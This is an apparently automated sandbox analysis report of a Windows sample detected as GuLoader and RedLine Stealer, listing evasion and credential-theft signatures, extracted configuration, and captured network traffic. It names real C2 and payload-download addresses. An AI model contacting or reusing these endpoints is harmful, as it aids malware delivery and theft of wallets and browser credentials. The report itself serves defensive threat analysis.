Loading ...

Play interactive tourEdit tour

Windows Analysis Report mixfive_20211216-221155

Overview

General Information

Sample Name:mixfive_20211216-221155 (renamed file extension from none to exe)
Analysis ID:541451
MD5:66e3c71bcd364eb5cf19cb820683ef0c
SHA1:a51f002e800d652c14b2de10a63bbb80d276a33b
SHA256:ee23fa71bea1f05017e21b38e7592db6334a0fc4e9e44bb48452b40a4ddf0677
Tags:exeGuLoaderRedlineStealer
Infos:

Most interesting Screenshot:

Detection

GuLoader RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected GuLoader
Hides threads from debuggers
Tries to steal Crypto Currency Wallets
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Is looking for software installed on the system
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • mixfive_20211216-221155.exe (PID: 4728 cmdline: "C:\Users\user\Desktop\mixfive_20211216-221155.exe" MD5: 66E3C71BCD364EB5CF19CB820683EF0C)
    • mixfive_20211216-221155.exe (PID: 4240 cmdline: "C:\Users\user\Desktop\mixfive_20211216-221155.exe" MD5: 66E3C71BCD364EB5CF19CB820683EF0C)
  • cleanup

Malware Configuration

Threatname: RedLine

{"C2 url": ["194.26.229.202:18758"], "Bot Id": "private_1"}

Threatname: GuLoader

{"Payload URL": "http://185.112.83.8/Allocation.bin"}

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000C.00000002.1006545439.0000000020590000.00000004.00020000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      0000000C.00000002.1004805288.000000001E100000.00000004.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        0000000C.00000003.945608436.0000000000A3F000.00000004.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          0000000C.00000000.813287233.0000000000560000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            0000000C.00000002.1006136622.000000001F477000.00000004.00000001.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              Click to see the 5 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              12.2.mixfive_20211216-221155.exe.20590000.2.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                12.2.mixfive_20211216-221155.exe.20b60000.4.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  12.3.mixfive_20211216-221155.exe.a3fcd8.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                    12.2.mixfive_20211216-221155.exe.20590000.2.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                      12.2.mixfive_20211216-221155.exe.20b60000.4.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                        Click to see the 7 entries

                        Sigma Overview

                        No Sigma rule has matched

                        Jbx Signature Overview

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection:

                        barindex
                        Found malware configurationShow sources
                        Source: 0000000C.00000000.813287233.0000000000560000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "http://185.112.83.8/Allocation.bin"}
                        Source: 12.2.mixfive_20211216-221155.exe.1e140f6e.0.raw.unpackMalware Configuration Extractor: RedLine {"C2 url": ["194.26.229.202:18758"], "Bot Id": "private_1"}
                        Source: mixfive_20211216-221155.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                        Source: mixfive_20211216-221155.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                        Source: Binary string: _.pdb source: mixfive_20211216-221155.exe, 0000000C.00000002.1004805288.000000001E100000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1006545439.0000000020590000.00000004.00020000.sdmp, mixfive_20211216-221155.exe, 0000000C.00000003.945608436.0000000000A3F000.00000004.00000001.sdmp
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_00406873 FindFirstFileW,FindClose,
                        Source: C:\Users\user\Desktop\mixfive_20211216-221155.exeCode function: 0_2_0040290B FindFirstFileW,

                        Networking:

                        barindex
                        Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                        Source: TrafficSnort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.2.4:49857 -> 185.112.83.8:80
                        C2 URLs / IPs found in malware configurationShow sources
                        Source: Malware configuration extractorURLs: http://185.112.83.8/Allocation.bin
                        Source: Joe Sandbox ViewASN Name: SUPERSERVERSDATACENTERRU SUPERSERVERSDATACENTERRU
                        Source: Joe Sandbox ViewASN Name: HEANETIE HEANETIE
                        Source: global trafficHTTP traffic detected: GET /Allocation.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 185.112.83.8Cache-Control: no-cache
                        Source: global trafficTCP traffic: 192.168.2.4:49858 -> 194.26.229.202:18758
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.112.83.8
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005789516.000000001E88E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005191575.000000001E598000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmpString found in binary or memory: l9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmpString found in binary or memory: romium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-j
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1001528934.0000000000920000.00000004.00000001.sdmpString found in binary or memory: http://185.112.83.8/Allocation.bin
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1001581740.00000000009D8000.00000004.00000020.sdmpString found in binary or memory: http://185.112.83.8/Allocation.binwq
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005789516.000000001E88E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005191575.000000001E598000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmpString found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
                        Source: mixfive_20211216-221155.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                        Source: mixfive_20211216-221155.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                        Source: mixfive_20211216-221155.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                        Source: mixfive_20211216-221155.exeString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                        Source: mixfive_20211216-221155.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                        Source: mixfive_20211216-221155.exeString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmpString found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005789516.000000001E88E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005191575.000000001E598000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmpString found in binary or memory: http://forms.rea
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005789516.000000001E88E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005191575.000000001E598000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmpString found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmpString found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005789516.000000001E88E000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005191575.000000001E598000.00000004.00000001.sdmp, mixfive_20211216-221155.exe, 0000000C.00000002.1005348723.000000001E65C000.00000004.00000001.sdmpString found in binary or memory: http://go.micros
                        Source: mixfive_20211216-221155.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                        Source: mixfive_20211216-221155.exeString found in binary or memory: http://ocsp.digicert.com0C
                        Source: mixfive_20211216-221155.exeString found in binary or memory: http://ocsp.digicert.com0O
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultl
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1005047042.000000001E4E3000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                        Source: mixfive_20211216-221155.exe, 0000000C.00000002.1004982409.000000001E451000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
